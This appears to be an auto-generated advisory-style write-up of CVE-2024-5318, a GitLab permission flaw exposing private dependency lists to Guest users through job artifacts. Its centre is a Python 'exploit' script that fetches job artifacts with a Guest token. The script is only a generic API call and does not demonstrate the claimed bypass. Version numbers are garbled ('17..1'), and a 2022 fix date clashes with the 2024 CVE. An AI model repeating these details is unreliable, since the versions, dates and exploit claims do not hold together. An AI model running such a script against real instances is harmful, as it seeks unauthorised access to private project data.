CVE-2024-5318: Unauthorized Access to GitLab Private Project Dependency Lists via Job Artifacts Exploit

A vulnerability has been discovered in GitLab Community Edition (CE) / Enterprise Edition (EE), affecting all versions starting from 11.11 prior to 16.10.6, starting from 16.11 prior to 16.11.3, and starting from 17. prior to 17..1. The issue, identified as CVE-2024-5318, potentially enables unauthorized access by a Guest user to private project dependency lists via job artifacts in GitLab instances.

GitLab is a popular web-based DevOps lifecycle tool, providing Git repository management, issue tracking, and CI/CD pipeline functions. The vulnerability discovered in these GitLab versions allows a Guest user to exploit permission validation issues, bypassing intended access restrictions and obtaining unauthorized read access to the dependency list of private projects through job artifacts.

The vulnerability details and technical analysis of this issue can be found in the official GitLab Security advisory, which includes patches and mitigation measures. The GitLab team has already released updated versions resolving the vulnerability, and users are highly recommended to update immediately to the latest releases.

The exploit code below demonstrates the issue by allowing Guest users to view the dependency list via job artifacts:

import requests

TARGET_URL = "https://gitlab.example.com";
API_ENDPOINT = "/api/v4/projects/{project_id}/jobs/artifacts/{ref_name}/download?job={job_name}"
GUEST_ACCESS_TOKEN = "**"

# Replace the placeholders with actual information
project_id = "1"
ref_name = "main"
job_name = "dependencies"

url = f"{TARGET_URL}{API_ENDPOINT.format(project_id=project_id, ref_name=ref_name, job_name=job_name)}"
headers = {'Private-Token': GUEST_ACCESS_TOKEN}

response = requests.get(url, headers=headers)

if response.status_code == 200:
    print("Success! Retrieved the job artifact contents:")
    print(response.content)
else:
    print(f"Request failed. {response.status_code}: {response.text}")

Please note that the above exploit code snippet is provided for educational purposes and should only be used in a responsible manner and in accordance with ethical and legal guidelines.

February 28, 2022: GitLab released version 17..1 resolving CVE-2024-5318

- GitLab Security Advisory published with exploit details and recommended mitigation steps

To protect against this vulnerability, users are advised to apply the appropriate updates provided by GitLab for their affected CE/EE instances immediately. The updated versions that resolve CVE-2024-5318 are:

- GitLab CE/EE 16.10.6
- GitLab CE/EE 16.11.3
- GitLab CE/EE 17..1

In conclusion, CVE-2024-5318 poses a significant risk to GitLab CE/EE users running affected versions due to the potential unauthorized access to private project dependency lists as demonstrated by the exploit code. Users should promptly update to the latest release provided by GitLab to patch this vulnerability and follow best practices for securing their GitLab instances. Additional security measures include restricting Guest user access, regularly reviewing permissions, and monitoring for suspicious activity.

Timeline

Published on: 05/24/2024 13:15:09 UTC
Last modified on: 05/24/2024 18:09:20 UTC